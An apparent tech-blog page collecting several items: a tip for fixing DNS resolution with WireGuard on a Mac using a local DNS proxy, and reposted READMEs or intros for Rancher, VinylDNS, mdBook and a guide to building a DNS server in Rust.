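To confirm that the local listener is actually answering, here is a quick check from Python (assuming the dnspython package; a plain dig @127.0.0.1 some-domain works just as well):
# Query the local dnsproxy listener on 127.0.0.1:53 to confirm it resolves names.
# Assumes the dnspython package (pip install dnspython).
import dns.resolver

r = dns.resolver.Resolver(configure=False)    # don't read /etc/resolv.conf
r.nameservers = ["127.0.0.1"]
print(r.resolve("www.google.com", "A").rrset) # on dnspython 1.x use r.query(...)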



A practical example:
Take WireGuard as an example.
After setting up the WireGuard server and client, we run the following on the client Mac:
sudo wg-quick up wg0
This command changes the client Mac's DNS server address to 8.8.8.8, and at that point the WireGuard VPN really does work for getting past the firewall. But it doesn't last long: when visiting some site, it gets stuck on "resolving host" and fails to resolve for a long time, because the local machine connects to 8.8.8.8 directly, the connection is disrupted by the GFW and fails, and so domain names cannot be resolved. So what do we do? First run:
sudo networksetup -setdnsservers "Wi-Fi" Empty && sudo networksetup -setdnsservers "Wi-Fi" 127.0.0.1 , which changes the client Mac's DNS server address to 127.0.0.1, and then:
cd ~/dnsproxy-by-ARwMq9b6 && ./dnsproxy -c config.toml

Do not close this terminal. After that, the DNS poisoning problem is solved.

This program is much easier to use than the dns2socks described at http://www.briten.info/2019/07/socksdns-query-dns2socks.html. That dns2socks doesn't seem to let you change its parameters; I tested it and it failed.
--------

This program, too, only keeps the circumvention working for about an hour. It looks like building your own 'DNS over HTTPS' DNS server is the only real solution.

Docker container management platform - rancher

Complete container management platform 
Rancher is an open source project that provides a container management platform built for organizations that deploy containers in production. Rancher makes it easy to run Kubernetes everywhere, meet IT requirements, and empower DevOps teams.
Looking for Rancher 1.6.x info? Click here

Latest Release

  • Latest - v2.2.4 - rancher/rancher:latest - Read the full release notes.
  • Stable - v2.2.4 - rancher/rancher:stable - Read the full release notes.
To get automated notifications of our latest release, you can watch the announcements category in our forums, or subscribe to the RSS feed https://forums.rancher.com/c/announcements.rss.

Quick Start

sudo docker run -d --restart=unless-stopped -p 80:80 -p 443:443 rancher/rancher
Open your browser to https://localhost

Installation

Rancher can be deployed in either a single node or multi-node setup. Please refer to the following for guides on how to get Rancher up and running.
No internet access? Refer to our Air Gap Installation for instructions on how to use your own private registry to install Rancher.

Minimum Requirements

  • Operating Systems
    • Ubuntu 16.04 (64-bit)
    • Red Hat Enterprise Linux 7.5 (64-bit)
    • RancherOS 1.4 (64-bit)
  • Hardware
    • 4 GB of Memory
  • Software
    • Docker v1.12.6, 1.13.1, 17.03.2

Using Rancher

To learn more about using Rancher, please refer to our Rancher Documentation.

Source Code

This repo is a meta-repo used for packaging and contains the majority of the Rancher codebase. Rancher does include other Rancher projects, including:
Rancher also includes other open source libraries and projects. Please go here to view the entire list.

Support, Discussion, and Community

If you need any help with Rancher or RancherOS, please join us at our Rancher forums, the #rancher IRC channel, or Slack, where most of our team hangs out.
Please submit any Rancher bugs, issues, and feature requests to rancher/rancher.
Please submit any RancherOS bugs, issues, and feature requests to rancher/os.
For security issues, please email security@rancher.com instead of posting a public issue in GitHub. You may (but are not required to) use the GPG key located on Keybase.

Source code of the DNS record lookup site dnsrecords.io

A guide to writing a DNS Server from scratch in Rust

A guide to writing a DNS Server from scratch in Rust.

Building a DNS server in Rust

The internet has a rich conceptual foundation, with many exciting ideas that enable it to function as we know it. One of the really cool ones is DNS. Before it was invented, everyone on the internet - which admittedly wasn't that many at that stage - relied on a shared file called HOSTS.TXT, maintained by the Stanford Research Institute. This file was synchronized manually through FTP, and as the number of hosts grew, so did the rate of change and the unfeasibility of the system. In 1983, Paul Mockapetris set out to find a long term solution to the problem and went on to design and implement DNS. It's a testament to his genius that his creation has been able to scale from a few thousand computers to the Internet as we know it today.
With the combined goal of gaining a deep understanding of DNS, of doing something interesting with Rust, and of scratching some of my own itches, I originally set out to implement my own DNS server. This document is not a truthful chronicle of that journey, but rather an idealized version of it, without all the detours I ended up taking. We'll gradually implement a full DNS server, starting from first principles.

DNS record management platform - vinyldns

Vendor agnostic DNS front-end for streamlining DNS operations and enabling self-service for your DNS infrastructure
VinylDNS is a vendor agnostic front-end for enabling self-service DNS and streamlining DNS operations. VinylDNS manages millions of DNS records supporting thousands of engineers in production at Comcast. The platform provides fine-grained access controls, auditing of all changes, a self-service user interface, secure RESTful API, and integration with infrastructure automation tools like Ansible and Terraform. It is designed to integrate with your existing DNS infrastructure, and provides extensibility to fit your installation.
VinylDNS helps secure DNS management via:
  • AWS Sig4 signing of all messages to ensure that the message that was sent was not altered in transit
  • Throttling of DNS updates to rate limit concurrent updates against your DNS systems
  • Encrypting user secrets and TSIG keys at rest and in-transit
  • Recording every change made to DNS records and zones
Integration is simple with first-class language support including:
  • java
  • ruby
  • python
  • go-lang
  • javascript

Table of Contents

Quickstart

Docker images for VinylDNS live on Docker Hub at https://hub.docker.com/u/vinyldns/. To start up a local instance of VinylDNS on your machine with docker:
  1. Ensure that you have docker and docker-compose
  2. Clone the repo: git clone https://github.com/vinyldns/vinyldns.git
  3. Navigate to repo: cd vinyldns
  4. Run ./bin/docker-up-vinyldns.sh. This will start up the API at localhost:9000 and the portal at localhost:9001
  5. See Developer Guide for how to load a test DNS zone
  6. To stop the local setup, run ./bin/remove-vinyl-containers.sh.
There exist several clients at https://github.com/vinyldns that can be used to make API requests, using the endpoint http://localhost:9000

Things to try in the portal

  1. View the portal at http://localhost:9001 in a web browser
  2. Login with the credentials testuser and testpassword
  3. Navigate to the groups tab: http://localhost:9001/groups
  4. Click on the New Group button and create a new group, the group id is the uuid in the url after you view the group
  5. View zones you connected to in the zones tab: http://localhost:9001/zones (Note, see Developer Guide for creating a zone)
  6. You will see that some records are preloaded in the zone already; this is because these records are preloaded in the local docker DNS server and VinylDNS automatically syncs records with the backend DNS server upon zone connection
  7. From here, you can create DNS record sets in the Manage Records tab, and manage zone settings and ACL rules in the Manage Zone tab
  8. To try creating a DNS record, click on the Create Record Set button under Records, Record Type = A, Record Name = my-test-a, TTL = 300, IP Addresses = 1.1.1.1
  9. Click on the Refresh button under Records, you should see your new record created

Other things to note

  1. Upon connecting to a zone for the first time, a zone sync is run to provide VinylDNS with a copy of the records in the zone
  2. Changes made via VinylDNS are made against the DNS backend, you do not need to sync the zone further to push those changes out
  3. If changes to the zone are made outside of VinylDNS, then the zone will have to be re-synced to give VinylDNS a copy of those records
  4. If you wish to change the URL used in the creation process from http://localhost:9000 to, say, http://vinyldns.yourdomain.com:9000, you can modify the bin/.env file before execution (a hypothetical sketch follows this list)
  5. A similar file, docker/.env, can be modified to change the default ports for the Portal and API. You must also update their config files with the new ports: https://www.vinyldns.io/operator/config-portal & https://www.vinyldns.io/operator/config-api
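As a deliberately hypothetical illustration of item 4 (the variable name below is made up; the actual keys are whatever bin/.env defines, so check the file itself), the change might look like:
# bin/.env (hypothetical key name, shown only to illustrate pointing the setup at another host)
VINYLDNS_API_URL=http://vinyldns.yourdomain.com:9000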

Code of Conduct

This project and everyone participating in it are governed by the VinylDNS Code of Conduct. By participating, you agree to this Code. Please report any violations of the Code of Conduct to vinyldns-core@googlegroups.com.

Developer Guide

See DEVELOPER_GUIDE.md for instructions on setting up VinylDNS locally.

from https://github.com/vinyldns/vinyldns

An e-book generator written in Rust - mdBook

Create book from markdown files. Like Gitbook but implemented in Rust.
mdBook is a utility to create modern online books from Markdown files.

What does it look like?

The User Guide for mdBook is written in Markdown and uses mdBook itself to generate the online book-like website you can read. The documentation uses the latest version on GitHub and showcases the available features.

Installation

There are multiple ways to install mdBook.
  1. Binaries
    Binaries are available for download here. Make sure to put the path to the binary into your PATH.
  2. From Crates.io
    This requires at least Rust 1.34 and Cargo to be installed. Once you have installed Rust, type the following in the terminal:
    cargo install mdbook
    This will download and compile mdBook for you, the only thing left to do is to add the Cargo bin directory to your PATH.
    Note for automatic deployment
    If you are using a script to do automatic deployments using Travis or another CI server, we recommend that you specify a semver version range for mdBook when you install it through your script!
    This will constrain the CI server to install the latest non-breaking version of mdBook and will prevent your books from failing to build because we released a new version. For example (a minimal CI configuration sketch also follows this installation list):
    cargo install mdbook --vers "^0.1.0"
  3. From Git
    The version published to crates.io will always be slightly behind the version hosted here on GitHub. If you need the latest version you can build the git version of mdBook yourself. Cargo makes this super easy!
    cargo install --git https://github.com/rust-lang-nursery/mdBook.git mdbook
    Again, make sure to add the Cargo bin directory to your PATH.
  4. For Contributions
    If you want to contribute to mdBook you will have to clone the repository on your local machine:
    git clone https://github.com/rust-lang-nursery/mdBook.git
    cd into mdBook/ and run
    cargo build
    The resulting binary can be found in mdBook/target/debug/ under the name mdbook or mdbook.exe.
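Following up on the automatic-deployment note in step 2, a minimal Travis CI configuration might look like the following (a sketch only, assuming a standard Travis Rust environment; adapt the version range and any deploy steps to your own setup):
# .travis.yml (sketch): build the book on CI with a pinned, non-breaking mdBook version
language: rust
install:
  - cargo install mdbook --vers "^0.1.0"
script:
  - mdbook build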

Usage

mdBook will primarily be used as a command line tool, even though it exposes all its functionality as a Rust crate for integration in other projects.
Here are the main commands you will want to run; a short example session follows this list. For a more exhaustive explanation, check out the User Guide.
  • mdbook init
    The init command will create a directory with the minimal boilerplate to start with.
    book-test/
    ├── book
    └── src
        ├── chapter_1.md
        └── SUMMARY.md
    book and src are both directories. src contains the markdown files that will be used to render the output to the book directory.
    Please, take a look at the CLI docs for more information and some neat tricks.
  • mdbook build
    This is the command you will run to render your book. It reads the SUMMARY.md file to understand the structure of your book, takes the markdown files in the source directory as input, and outputs static HTML pages that you can upload to a server.
  • mdbook watch
    When you run this command, mdbook will watch your markdown files to rebuild the book on every change. This avoids having to come back to the terminal to type mdbook build over and over again.
  • mdbook serve
    Does the same thing as mdbook watch but additionally serves the book at http://localhost:3000 (port is changeable) and reloads the browser when a change occurs.
  • mdbook clean
    Deletes the directory in which the generated book is located.
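Putting these commands together, a typical first session might look like this (a sketch; book-test matches the init layout shown above, and edit stands in for your editor of choice, as in the plugin example further down):
$ mdbook init book-test
$ cd book-test
$ edit src/chapter_1.md
$ mdbook build    # writes static HTML to the book/ directory
$ mdbook serve    # serves at http://localhost:3000 and rebuilds on changes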

3rd Party Plugins

The way a book is loaded and rendered can be configured by the user via third party plugins. These plugins are just programs which will be invoked during the build process and are split into roughly two categories: preprocessors and renderers.
Preprocessors are used to transform a book before it is sent to a renderer. One example would be to replace all occurrences of {{#include some_file.ext}} with the contents of that file (a sketch follows this list). Some existing preprocessors are:
  • index - a built-in preprocessor (enabled by default) which will transform all README.md chapters to index.md so that foo/README.md can be accessed via the URL foo/ when the book is published
  • links - a built-in preprocessor (enabled by default) for expanding the {{# playpen}} and {{# include}} helpers in a chapter.
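For instance, the links preprocessor above lets a chapter pull in an external file verbatim; a minimal sketch of a chapter using it (the included path snippets/hello.rs is hypothetical):
# Chapter 1

Here is the full example program:

{{#include snippets/hello.rs}}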
Renderers are given the final book so they can do something with it. This is typically used for, as the name suggests, rendering the document in a particular format; however, there's nothing stopping a renderer from doing static analysis of a book in order to validate links or run tests. Some existing renderers are:
  • html - the built-in renderer which will generate an HTML version of the book
  • linkcheck - a backend which will check that all links are valid
  • epub - an experimental EPUB generator
Note for Developers: Feel free to send us a PR if you've developed your own plugin and want it mentioned here.
A preprocessor or renderer is enabled by installing the appropriate program and then mentioning it in the book's book.toml file.
$ cargo install mdbook-linkcheck
$ edit book.toml && cat book.toml
[book]
title = "My Awesome Book"
authors = ["Michael-F-Bryan"]

[output.html]

[output.linkcheck] # enable the "mdbook-linkcheck" renderer

$ mdbook build
2018-10-20 13:57:51 [INFO] (mdbook::book): Book building has started
2018-10-20 13:57:51 [INFO] (mdbook::book): Running the html backend
2018-10-20 13:57:53 [INFO] (mdbook::book): Running the linkcheck backend
For more information on the plugin system, consult the User Guide.

As a library

Aside from the command line interface, this crate can also be used as a library. This means that you could integrate it into an existing project, such as a web app. Since the command line interface is just a wrapper around the library functionality, when you use this crate as a library you have full access to all the functionality of the command line interface, with an easy-to-use API and more!
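As a minimal sketch of library usage (assuming the MDBook::load and build entry points documented in the API docs; the book path is a placeholder):
use mdbook::MDBook;

fn main() {
    // Load the book rooted at the directory containing book.toml and src/
    let md = MDBook::load("path/to/book").expect("failed to load the book");
    // Render it with the configured backends (the html renderer by default)
    md.build().expect("failed to build the book");
}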
See the User Guide and the API docs for more information.
